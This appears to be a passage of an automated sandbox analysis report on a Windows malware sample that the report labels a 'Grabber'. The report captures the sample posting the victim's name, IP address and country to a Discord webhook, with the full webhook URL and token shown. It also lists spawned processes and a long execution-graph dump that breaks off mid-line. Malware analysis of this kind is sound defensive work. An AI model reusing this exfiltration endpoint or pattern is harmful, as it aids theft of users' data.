                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            3192.168.2.349701162.159.128.233443C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC1OUTPOST /api/webhooks/1095074431224791041/jQaZ4hKGjbnKUzyIOTiqr_bj9R4GOqqnGusOIWEt9Md6puBiIfxAHgdsq2aAU_BYlXjW HTTP/1.1
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            Content-Length: 429
                                                                                                                                                                                                                            Host: ptb.discord.com
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2023-06-03 10:17:36 UTC1OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3c 3a 64 6f 74 3a 31 30 36 39 33 30 33 33 34 31 36 35 31 33 33 33 32 33 32 3e 20 2a 2a 4e 6f 6d 2a 2a 20 3a 20 60 48 41 52 44 5a 60 5c 6e 3c 3a 64 6f 74 3a 31 30 36 39 33 30 33 33 34 31 36 35 31 33 33 33 32 33 32 3e 20 2a 2a 49 50 2a 2a 20 3a 20 60 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 33 60 5c 6e 3c 3a 64 6f 74 3a 31 30 36 39 33 30 33 33 34 31 36 35 31 33 33 33 32 33 32 3e 20 2a 2a 4e 61 74 69 6f 6e 6e 61 6c 69 74 5c 75 30 30 65 39 2a 2a 20 3a 20 3a 66 6c 61 67 5f 75 73 3a 20 60 55 6e 69 74 65 64 20 53 74 61 74 65 73 60 5c 6e 3c 3a 64 6f 74 3a 31 30 36 39 33 30 33 33 34 31 36 35 31 33 33 33 32 33 32 3e 20 2a 2a 46 69 63 68 69 65 72 2a 2a 20 3a 20 60 47 72 61 62 62 65 72 60 22 2c 20 22 75 73 65 72 6e 61 6d 65 22 3a
                                                                                                                                                                                                                            Data Ascii: {"content": "<:dot:1069303341651333232> **Nom** : `user`\n<:dot:1069303341651333232> **IP** : `102.129.143.43`\n<:dot:1069303341651333232> **Nationnalit\u00e9** : :flag_us: `United States`\n<:dot:1069303341651333232> **Fichier** : `Grabber`", "username":
                                                                                                                                                                                                                            2023-06-03 10:17:37 UTC2INHTTP/1.1 204 No Content
                                                                                                                                                                                                                            Date: Sat, 03 Jun 2023 10:17:37 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            set-cookie: __dcfduid=dce4204e01f711ee9b609a47035a547a; Expires=Thu, 01-Jun-2028 10:17:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                            x-ratelimit-reset: 1685787458
                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k6zBZtduXcDRj0PPAnjg5tDFQEzPxQdQHQB1IfWzwaWMSv19BSjWkw%2Fp%2F9dMSu%2B6iy2umd4%2Fz57pOfHXeoa9gB%2BhdSfXj1OEbzJ7svMSjuvHZnaKEWocz4loi5rC2BN4Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Set-Cookie: __sdcfduid=dce4204e01f711ee9b609a47035a547afe15e409175511328d473264d62fba18c7882bc03036b6ec52bcd0f8c0048d07; Expires=Thu, 01-Jun-2028 10:17:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                            Set-Cookie: __cfruid=58558fea894053f3300cacda8f07041139850b05-1685787457; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            2023-06-03 10:17:37 UTC3INData Raw: 43 46 2d 52 41 59 3a 20 37 64 31 37 32 66 66 34 39 63 34 39 31 65 31 30 2d 46 52 41 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: CF-RAY: 7d172ff49c491e10-FRA


                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:12:17:09
                                                                                                                                                                                                                            Start date:03/06/2023
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            Imagebase:0x7ff735c40000
                                                                                                                                                                                                                            File size:17968187 bytes
                                                                                                                                                                                                                            MD5 hash:0A6E31E8D7A0989F682B7AD92D489EB4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:12:17:15
                                                                                                                                                                                                                            Start date:03/06/2023
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            Imagebase:0x7ff735c40000
                                                                                                                                                                                                                            File size:17968187 bytes
                                                                                                                                                                                                                            MD5 hash:0A6E31E8D7A0989F682B7AD92D489EB4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:12:17:16
                                                                                                                                                                                                                            Start date:03/06/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                            Imagebase:0x7ff707bb0000
                                                                                                                                                                                                                            File size:273920 bytes
                                                                                                                                                                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:12:17:16
                                                                                                                                                                                                                            Start date:03/06/2023
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:11.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:19.1%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:80
                                                                                                                                                                                                                              execution_graph 18527 7ff735c565f4 18532 7ff735c5eda0 EnterCriticalSection 18527->18532 19623 7ff735c5fd70 19634 7ff735c6591c 19623->19634 19635 7ff735c65929 19634->19635 19636 7ff735c59468 __free_lconv_num 11 API calls 19635->19636 19637 7ff735c65945 19635->19637 19636->19635 19638 7ff735c59468 __free_lconv_num 11 API calls 19637->19638 19639 7ff735c5fd79 19637->19639 19638->19637 19640 7ff735c5eda0 EnterCriticalSection 19639->19640 18533 7ff735c687de 18534 7ff735c687ee 18533->18534 18537 7ff735c539cc LeaveCriticalSection 18534->18537 19661 7ff735c58058 19664 7ff735c57fdc 19661->19664 19671 7ff735c5eda0 EnterCriticalSection 19664->19671 18545 7ff735c59ae0 18546 7ff735c59ae5 18545->18546 18547 7ff735c59afa 18545->18547 18551 7ff735c59b00 18546->18551 18552 7ff735c59b4a 18551->18552 18553 7ff735c59b42 18551->18553 18555 7ff735c59468 __free_lconv_num 11 API calls 18552->18555 18554 7ff735c59468 __free_lconv_num 11 API calls 18553->18554 18554->18552 18556 7ff735c59b57 18555->18556 18557 7ff735c59468 __free_lconv_num 11 API calls 18556->18557 18558 7ff735c59b64 18557->18558 18559 7ff735c59468 __free_lconv_num 11 API calls 18558->18559 18560 7ff735c59b71 18559->18560 18561 7ff735c59468 __free_lconv_num 11 API calls 18560->18561 18562 7ff735c59b7e 18561->18562 18563 7ff735c59468 __free_lconv_num 11 API calls 18562->18563 18564 7ff735c59b8b 18563->18564 18565 7ff735c59468 __free_lconv_num 11 API calls 18564->18565 18566 7ff735c59b98 18565->18566 18567 7ff735c59468 __free_lconv_num 11 API calls 18566->18567 18568 7ff735c59ba5 18567->18568 18569 7ff735c59468 __free_lconv_num 11 API calls 18568->18569 18570 7ff735c59bb5 18569->18570 18571 7ff735c59468 __free_lconv_num 11 API calls 18570->18571 18572 7ff735c59bc5 18571->18572 18577 7ff735c599b0 18572->18577 18591 7ff735c5eda0 EnterCriticalSection 18577->18591 15617 7ff735c4a514 15642 7ff735c4a974 15617->15642 15620 7ff735c4a660 15742 7ff735c4aca0 IsProcessorFeaturePresent 15620->15742 15621 7ff735c4a530 __scrt_acquire_startup_lock 15623 7ff735c4a66a 15621->15623 15624 7ff735c4a54e 15621->15624 15625 7ff735c4aca0 7 API calls 15623->15625 15632 7ff735c4a590 __scrt_release_startup_lock 15624->15632 15650 7ff735c57c74 15624->15650 15630 7ff735c4a675 __CxxCallCatchBlock 15625->15630 15628 7ff735c4a573 15631 7ff735c4a5f9 15659 7ff735c4adec 15631->15659 15632->15631 15731 7ff735c57f90 15632->15731 15634 7ff735c4a5fe 15662 7ff735c41000 15634->15662 15639 7ff735c4a621 15639->15630 15738 7ff735c4ab08 15639->15738 15749 7ff735c4af68 15642->15749 15645 7ff735c4a9a3 15751 7ff735c58668 15645->15751 15646 7ff735c4a528 15646->15620 15646->15621 15651 7ff735c57c87 15650->15651 15652 7ff735c4a56f 15651->15652 15794 7ff735c4a430 15651->15794 15652->15628 15654 7ff735c57c30 15652->15654 15655 7ff735c57c35 15654->15655 15656 7ff735c57c66 15654->15656 15655->15656 15873 7ff735c4a4f8 15655->15873 15881 7ff735c53964 15655->15881 15656->15632 15905 7ff735c4b800 15659->15905 15663 7ff735c4100b 15662->15663 15907 7ff735c46f20 15663->15907 15665 7ff735c4101d 15914 7ff735c545ec 15665->15914 15667 7ff735c435bc 15921 7ff735c41ba0 15667->15921 15671 7ff735c4a410 _wfindfirst32i64 8 API calls 15672 7ff735c43691 15671->15672 15736 7ff735c4ae30 GetModuleHandleW 15672->15736 15673 7ff735c435dc 15696 7ff735c4367d 15673->15696 15937 7ff735c43970 15673->15937 15675 7ff735c4360e 15675->15696 15940 7ff735c46440 15675->15940 15677 7ff735c4361e 15955 7ff735c469e0 15677->15955 15679 7ff735c43637 15959 7ff735c41a80 15679->15959 15682 7ff735c436a8 15683 7ff735c436c3 15682->15683 16073 7ff735c43100 15682->16073 15691 7ff735c43703 15683->15691 15970 7ff735c47250 15683->15970 15684 7ff735c41a80 121 API calls 15687 7ff735c43661 15684->15687 15687->15682 15688 7ff735c43665 15687->15688 16060 7ff735c42820 15688->16060 15689 7ff735c436e3 15692 7ff735c436e8 15689->15692 15693 7ff735c436f6 SetDllDirectoryW 15689->15693 15984 7ff735c45960 15691->15984 15695 7ff735c42820 59 API calls 15692->15695 15693->15691 15695->15696 15696->15671 15698 7ff735c4375e 15701 7ff735c43816 15698->15701 15705 7ff735c43771 15698->15705 15700 7ff735c43720 15700->15698 16087 7ff735c451f0 15700->16087 15988 7ff735c42f90 15701->15988 15713 7ff735c437b5 15705->15713 16181 7ff735c41be0 15705->16181 15706 7ff735c43735 16107 7ff735c45180 15706->16107 15707 7ff735c43754 15709 7ff735c45460 FreeLibrary 15707->15709 15709->15698 15713->15696 16185 7ff735c42f30 15713->16185 15714 7ff735c4373f 15714->15707 15718 7ff735c43743 15714->15718 15715 7ff735c4384b 15716 7ff735c46440 61 API calls 15715->15716 15722 7ff735c43857 15716->15722 16175 7ff735c457f0 15718->16175 15719 7ff735c437f1 15723 7ff735c45460 FreeLibrary 15719->15723 15722->15696 16005 7ff735c46a20 15722->16005 15723->15696 15732 7ff735c57fa7 15731->15732 15733 7ff735c57fc8 15731->15733 15732->15631 15734 7ff735c586b4 45 API calls 15733->15734 15735 7ff735c57fcd 15734->15735 15737 7ff735c4ae41 15736->15737 15737->15639 15739 7ff735c4ab19 15738->15739 15740 7ff735c4a638 15739->15740 15741 7ff735c4bdec __scrt_initialize_crt 7 API calls 15739->15741 15740->15628 15741->15740 15743 7ff735c4acc6 _wfindfirst32i64 __scrt_get_show_window_mode 15742->15743 15744 7ff735c4ace5 RtlCaptureContext RtlLookupFunctionEntry 15743->15744 15745 7ff735c4ad0e RtlVirtualUnwind 15744->15745 15746 7ff735c4ad4a __scrt_get_show_window_mode 15744->15746 15745->15746 15747 7ff735c4ad7c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15746->15747 15748 7ff735c4adce _wfindfirst32i64 15747->15748 15748->15623 15750 7ff735c4a996 __scrt_dllmain_crt_thread_attach 15749->15750 15750->15645 15750->15646 15752 7ff735c61b14 15751->15752 15753 7ff735c4a9a8 15752->15753 15761 7ff735c5b054 15752->15761 15753->15646 15755 7ff735c4bdec 15753->15755 15756 7ff735c4bdfe 15755->15756 15757 7ff735c4bdf4 15755->15757 15756->15646 15773 7ff735c4c160 15757->15773 15772 7ff735c5eda0 EnterCriticalSection 15761->15772 15774 7ff735c4bdf9 15773->15774 15775 7ff735c4c16f 15773->15775 15777 7ff735c4c1b8 15774->15777 15781 7ff735c4c388 15775->15781 15778 7ff735c4c1e3 15777->15778 15779 7ff735c4c1e7 15778->15779 15780 7ff735c4c1c6 DeleteCriticalSection 15778->15780 15779->15756 15780->15778 15785 7ff735c4c1f0 15781->15785 15786 7ff735c4c30a TlsFree 15785->15786 15791 7ff735c4c234 __vcrt_InitializeCriticalSectionEx 15785->15791 15787 7ff735c4c262 LoadLibraryExW 15789 7ff735c4c2d9 15787->15789 15790 7ff735c4c283 GetLastError 15787->15790 15788 7ff735c4c2f9 GetProcAddress 15788->15786 15789->15788 15792 7ff735c4c2f0 FreeLibrary 15789->15792 15790->15791 15791->15786 15791->15787 15791->15788 15793 7ff735c4c2a5 LoadLibraryExW 15791->15793 15792->15788 15793->15789 15793->15791 15795 7ff735c4a440 15794->15795 15811 7ff735c54e7c 15795->15811 15797 7ff735c4a44c 15817 7ff735c4a9c0 15797->15817 15799 7ff735c4a4b9 15800 7ff735c4aca0 7 API calls 15799->15800 15810 7ff735c4a4d5 15799->15810 15802 7ff735c4a4e5 15800->15802 15801 7ff735c4a464 _RTC_Initialize 15801->15799 15822 7ff735c4ab70 15801->15822 15802->15651 15804 7ff735c4a479 15825 7ff735c5746c 15804->15825 15810->15651 15812 7ff735c54e8d 15811->15812 15813 7ff735c54e95 15812->15813 15814 7ff735c53b18 _get_daylight 11 API calls 15812->15814 15813->15797 15815 7ff735c54ea4 15814->15815 15816 7ff735c59400 _invalid_parameter_noinfo 37 API calls 15815->15816 15816->15813 15818 7ff735c4a9d1 15817->15818 15821 7ff735c4a9d6 __scrt_release_startup_lock 15817->15821 15819 7ff735c4aca0 7 API calls 15818->15819 15818->15821 15820 7ff735c4aa4a 15819->15820 15821->15801 15852 7ff735c4ab34 15822->15852 15824 7ff735c4ab79 15824->15804 15826 7ff735c4a485 15825->15826 15827 7ff735c5748c 15825->15827 15826->15799 15851 7ff735c4ac44 InitializeSListHead 15826->15851 15828 7ff735c574aa GetModuleFileNameW 15827->15828 15829 7ff735c57494 15827->15829 15833 7ff735c574d5 15828->15833 15830 7ff735c53b18 _get_daylight 11 API calls 15829->15830 15831 7ff735c57499 15830->15831 15832 7ff735c59400 _invalid_parameter_noinfo 37 API calls 15831->15832 15832->15826 15867 7ff735c5740c 15833->15867 15836 7ff735c5751d 15837 7ff735c53b18 _get_daylight 11 API calls 15836->15837 15838 7ff735c57522 15837->15838 15839 7ff735c59468 __free_lconv_num 11 API calls 15838->15839 15842 7ff735c57530 15839->15842 15840 7ff735c57535 15841 7ff735c57557 15840->15841 15844 7ff735c5759c 15840->15844 15845 7ff735c57583 15840->15845 15843 7ff735c59468 __free_lconv_num 11 API calls 15841->15843 15842->15826 15843->15826 15848 7ff735c59468 __free_lconv_num 11 API calls 15844->15848 15846 7ff735c59468 __free_lconv_num 11 API calls 15845->15846 15847 7ff735c5758c 15846->15847 15849 7ff735c59468 __free_lconv_num 11 API calls 15847->15849 15848->15841 15850 7ff735c57598 15849->15850 15850->15826 15853 7ff735c4ab4e 15852->15853 15855 7ff735c4ab47 15852->15855 15856 7ff735c584f4 15853->15856 15855->15824 15859 7ff735c58130 15856->15859 15866 7ff735c5eda0 EnterCriticalSection 15859->15866 15868 7ff735c57424 15867->15868 15869 7ff735c5745c 15867->15869 15868->15869 15870 7ff735c5d3d0 _get_daylight 11 API calls 15868->15870 15869->15836 15869->15840 15871 7ff735c57452 15870->15871 15872 7ff735c59468 __free_lconv_num 11 API calls 15871->15872 15872->15869 15890 7ff735c4ae84 SetUnhandledExceptionFilter 15873->15890 15882 7ff735c5396f 15881->15882 15891 7ff735c5d9d4 15882->15891 15904 7ff735c5eda0 EnterCriticalSection 15891->15904 15906 7ff735c4ae03 GetStartupInfoW 15905->15906 15906->15634 15909 7ff735c46f3f 15907->15909 15908 7ff735c46f90 WideCharToMultiByte 15908->15909 15911 7ff735c47037 15908->15911 15909->15908 15909->15911 15912 7ff735c46fe6 WideCharToMultiByte 15909->15912 15913 7ff735c46f47 __std_exception_copy 15909->15913 16222 7ff735c426d0 15911->16222 15912->15909 15912->15911 15913->15665 15915 7ff735c5e27c 15914->15915 15917 7ff735c5e2cf 15915->15917 15918 7ff735c5e325 15915->15918 15916 7ff735c59330 _invalid_parameter_noinfo 37 API calls 15920 7ff735c5e2f8 15916->15920 15917->15916 16573 7ff735c5e154 15918->16573 15920->15667 15922 7ff735c41bb5 15921->15922 15924 7ff735c41bd0 15922->15924 16581 7ff735c42580 15922->16581 15924->15696 15925 7ff735c439f0 15924->15925 15926 7ff735c4a3b0 15925->15926 15927 7ff735c439fc GetModuleFileNameW 15926->15927 15928 7ff735c43a2b 15927->15928 15929 7ff735c43a42 15927->15929 15930 7ff735c426d0 57 API calls 15928->15930 16621 7ff735c47360 15929->16621 15932 7ff735c43a3e 15930->15932 15935 7ff735c4a410 _wfindfirst32i64 8 API calls 15932->15935 15934 7ff735c42820 59 API calls 15934->15932 15936 7ff735c43a7f 15935->15936 15936->15673 15938 7ff735c41be0 49 API calls 15937->15938 15939 7ff735c4398d 15938->15939 15939->15675 15941 7ff735c4644a 15940->15941 15942 7ff735c47250 57 API calls 15941->15942 15943 7ff735c4646c GetEnvironmentVariableW 15942->15943 15944 7ff735c464d6 15943->15944 15945 7ff735c46484 ExpandEnvironmentStringsW 15943->15945 15947 7ff735c4a410 _wfindfirst32i64 8 API calls 15944->15947 15946 7ff735c47360 59 API calls 15945->15946 15949 7ff735c464ac 15946->15949 15948 7ff735c464e8 15947->15948 15948->15677 15949->15944 15950 7ff735c464b6 15949->15950 16632 7ff735c5876c 15950->16632 15953 7ff735c4a410 _wfindfirst32i64 8 API calls 15954 7ff735c464ce 15953->15954 15954->15677 15956 7ff735c47250 57 API calls 15955->15956 15957 7ff735c469f7 SetEnvironmentVariableW 15956->15957 15958 7ff735c46a0f __std_exception_copy 15957->15958 15958->15679 15960 7ff735c41be0 49 API calls 15959->15960 15961 7ff735c41ab0 15960->15961 15962 7ff735c41be0 49 API calls 15961->15962 15967 7ff735c41b2a 15961->15967 15963 7ff735c41ad2 15962->15963 15964 7ff735c43970 49 API calls 15963->15964 15963->15967 15965 7ff735c41aeb 15964->15965 16639 7ff735c417a0 15965->16639 15967->15682 15967->15684 15968 7ff735c41b19 15968->15967 16676 7ff735c4e568 15968->16676 15971 7ff735c472f7 MultiByteToWideChar 15970->15971 15972 7ff735c47271 MultiByteToWideChar 15970->15972 15973 7ff735c4731a 15971->15973 15974 7ff735c4733f 15971->15974 15975 7ff735c47297 15972->15975 15978 7ff735c472bc 15972->15978 15976 7ff735c426d0 55 API calls 15973->15976 15974->15689 15977 7ff735c426d0 55 API calls 15975->15977 15979 7ff735c4732d 15976->15979 15980 7ff735c472aa 15977->15980 15978->15971 15981 7ff735c472d2 15978->15981 15979->15689 15980->15689 15982 7ff735c426d0 55 API calls 15981->15982 15983 7ff735c472e5 15982->15983 15983->15689 15985 7ff735c45975 15984->15985 15986 7ff735c43708 15985->15986 15987 7ff735c42580 59 API calls 15985->15987 15986->15698 16077 7ff735c45640 15986->16077 15987->15986 15989 7ff735c43044 15988->15989 15995 7ff735c43003 15988->15995 15990 7ff735c43083 15989->15990 15991 7ff735c41b60 74 API calls 15989->15991 15992 7ff735c4a410 _wfindfirst32i64 8 API calls 15990->15992 15991->15989 15993 7ff735c43095 15992->15993 15993->15696 15998 7ff735c46970 15993->15998 15995->15989 16994 7ff735c41440 15995->16994 17028 7ff735c42a40 15995->17028 17082 7ff735c41770 15995->17082 15999 7ff735c47250 57 API calls 15998->15999 16000 7ff735c4698f 15999->16000 16001 7ff735c47250 57 API calls 16000->16001 16002 7ff735c4699f 16001->16002 16003 7ff735c55cf0 38 API calls 16002->16003 16004 7ff735c469ad __std_exception_copy 16003->16004 16004->15715 16006 7ff735c46a30 16005->16006 16007 7ff735c47250 57 API calls 16006->16007 16008 7ff735c46a61 16007->16008 17907 7ff735c5699c 16008->17907 16011 7ff735c5699c 14 API calls 16012 7ff735c46a7a 16011->16012 16061 7ff735c42840 16060->16061 16062 7ff735c532c4 49 API calls 16061->16062 16063 7ff735c4288d __scrt_get_show_window_mode 16062->16063 16064 7ff735c47250 57 API calls 16063->16064 16065 7ff735c428ba 16064->16065 16066 7ff735c428f9 MessageBoxA 16065->16066 16067 7ff735c428bf 16065->16067 16069 7ff735c42913 16066->16069 16068 7ff735c47250 57 API calls 16067->16068 16070 7ff735c428d9 MessageBoxW 16068->16070 16071 7ff735c4a410 _wfindfirst32i64 8 API calls 16069->16071 16070->16069 16072 7ff735c42923 16071->16072 16072->15696 16074 7ff735c43117 16073->16074 16075 7ff735c43140 16073->16075 16074->16075 16076 7ff735c41770 59 API calls 16074->16076 16075->15683 16076->16074 16078 7ff735c45664 16077->16078 16082 7ff735c45691 16077->16082 16079 7ff735c4568c 16078->16079 16080 7ff735c41770 59 API calls 16078->16080 16078->16082 16086 7ff735c45687 __std_exception_copy memcpy_s 16078->16086 17971 7ff735c412b0 16079->17971 16080->16078 16082->16086 17997 7ff735c43b80 16082->17997 16084 7ff735c456f7 16085 7ff735c42820 59 API calls 16084->16085 16084->16086 16085->16086 16086->15700 16088 7ff735c45203 memcpy_s 16087->16088 16090 7ff735c453e9 __std_exception_copy 16088->16090 16093 7ff735c4543c 16088->16093 16095 7ff735c43b80 49 API calls 16088->16095 16096 7ff735c45346 16088->16096 16099 7ff735c41440 161 API calls 16088->16099 16101 7ff735c45425 16088->16101 18000 7ff735c41650 16088->18000 16091 7ff735c4a410 _wfindfirst32i64 8 API calls 16090->16091 16092 7ff735c43731 16091->16092 16092->15706 16092->15707 16094 7ff735c42820 59 API calls 16093->16094 16094->16090 16095->16088 16096->16090 16097 7ff735c43b80 49 API calls 16096->16097 16098 7ff735c45365 16097->16098 16100 7ff735c43b80 49 API calls 16098->16100 16099->16088 16102 7ff735c4538f 16100->16102 16103 7ff735c42820 59 API calls 16101->16103 16104 7ff735c43b80 49 API calls 16102->16104 16103->16090 16105 7ff735c453bf 16104->16105 16106 7ff735c43b80 49 API calls 16105->16106 16106->16090 18005 7ff735c46c00 16107->18005 16109 7ff735c45192 16110 7ff735c46c00 58 API calls 16109->16110 16111 7ff735c451a5 16110->16111 16112 7ff735c451ca 16111->16112 16113 7ff735c451bd GetProcAddress 16111->16113 16114 7ff735c42820 59 API calls 16112->16114 16117 7ff735c45a79 16113->16117 16118 7ff735c45a9c GetProcAddress 16113->16118 16116 7ff735c451d6 16114->16116 16116->15714 16121 7ff735c426d0 57 API calls 16117->16121 16118->16117 16119 7ff735c45ac1 GetProcAddress 16118->16119 16119->16117 16120 7ff735c45ae6 GetProcAddress 16119->16120 16120->16117 16122 7ff735c45b0e GetProcAddress 16120->16122 16123 7ff735c45a8c 16121->16123 16122->16117 16124 7ff735c45b36 GetProcAddress 16122->16124 16123->15714 16124->16117 16125 7ff735c45b5e GetProcAddress 16124->16125 16126 7ff735c45b7a 16125->16126 16127 7ff735c45b86 GetProcAddress 16125->16127 16126->16127 16176 7ff735c4580d 16175->16176 16177 7ff735c42820 59 API calls 16176->16177 16180 7ff735c43752 16176->16180 16180->15698 16182 7ff735c41c05 16181->16182 16183 7ff735c532c4 49 API calls 16182->16183 16184 7ff735c41c28 16183->16184 16184->15713 18009 7ff735c44700 16185->18009 16188 7ff735c42f7d 16188->15719 16190 7ff735c42f54 16190->16188 18061 7ff735c444d0 16190->18061 16192 7ff735c42f60 16192->16188 18071 7ff735c44600 16192->18071 16241 7ff735c4a3b0 16222->16241 16225 7ff735c42719 16243 7ff735c532c4 16225->16243 16230 7ff735c41be0 49 API calls 16231 7ff735c42778 __scrt_get_show_window_mode 16230->16231 16232 7ff735c47250 54 API calls 16231->16232 16233 7ff735c427a5 16232->16233 16234 7ff735c427aa 16233->16234 16235 7ff735c427e4 MessageBoxA 16233->16235 16236 7ff735c47250 54 API calls 16234->16236 16237 7ff735c427fe 16235->16237 16238 7ff735c427c4 MessageBoxW 16236->16238 16239 7ff735c4a410 _wfindfirst32i64 8 API calls 16237->16239 16238->16237 16240 7ff735c4280e 16239->16240 16240->15913 16242 7ff735c426ec GetLastError 16241->16242 16242->16225 16245 7ff735c5331e 16243->16245 16244 7ff735c53343 16246 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16244->16246 16245->16244 16247 7ff735c5337f 16245->16247 16260 7ff735c5336d 16246->16260 16273 7ff735c515d0 16247->16273 16249 7ff735c5345c 16252 7ff735c59468 __free_lconv_num 11 API calls 16249->16252 16251 7ff735c4a410 _wfindfirst32i64 8 API calls 16253 7ff735c42749 16251->16253 16252->16260 16261 7ff735c46dd0 16253->16261 16254 7ff735c53480 16254->16249 16256 7ff735c5348a 16254->16256 16255 7ff735c53431 16257 7ff735c59468 __free_lconv_num 11 API calls 16255->16257 16259 7ff735c59468 __free_lconv_num 11 API calls 16256->16259 16257->16260 16258 7ff735c53428 16258->16249 16258->16255 16259->16260 16260->16251 16262 7ff735c46ddc 16261->16262 16263 7ff735c46df7 GetLastError 16262->16263 16264 7ff735c46dfd FormatMessageW 16262->16264 16263->16264 16265 7ff735c46e4c WideCharToMultiByte 16264->16265 16266 7ff735c46e30 16264->16266 16268 7ff735c46e43 16265->16268 16269 7ff735c46e86 16265->16269 16267 7ff735c426d0 54 API calls 16266->16267 16267->16268 16271 7ff735c4a410 _wfindfirst32i64 8 API calls 16268->16271 16270 7ff735c426d0 54 API calls 16269->16270 16270->16268 16272 7ff735c42750 16271->16272 16272->16230 16274 7ff735c51607 16273->16274 16275 7ff735c515f7 16273->16275 16276 7ff735c5160d 16274->16276 16283 7ff735c5163d 16274->16283 16279 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16275->16279 16277 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16276->16277 16278 7ff735c51635 16277->16278 16278->16249 16278->16254 16278->16255 16278->16258 16279->16278 16282 7ff735c518f6 16285 7ff735c59330 _invalid_parameter_noinfo 37 API calls 16282->16285 16283->16275 16283->16278 16283->16282 16287 7ff735c51f48 16283->16287 16312 7ff735c51c18 16283->16312 16341 7ff735c514b0 16283->16341 16344 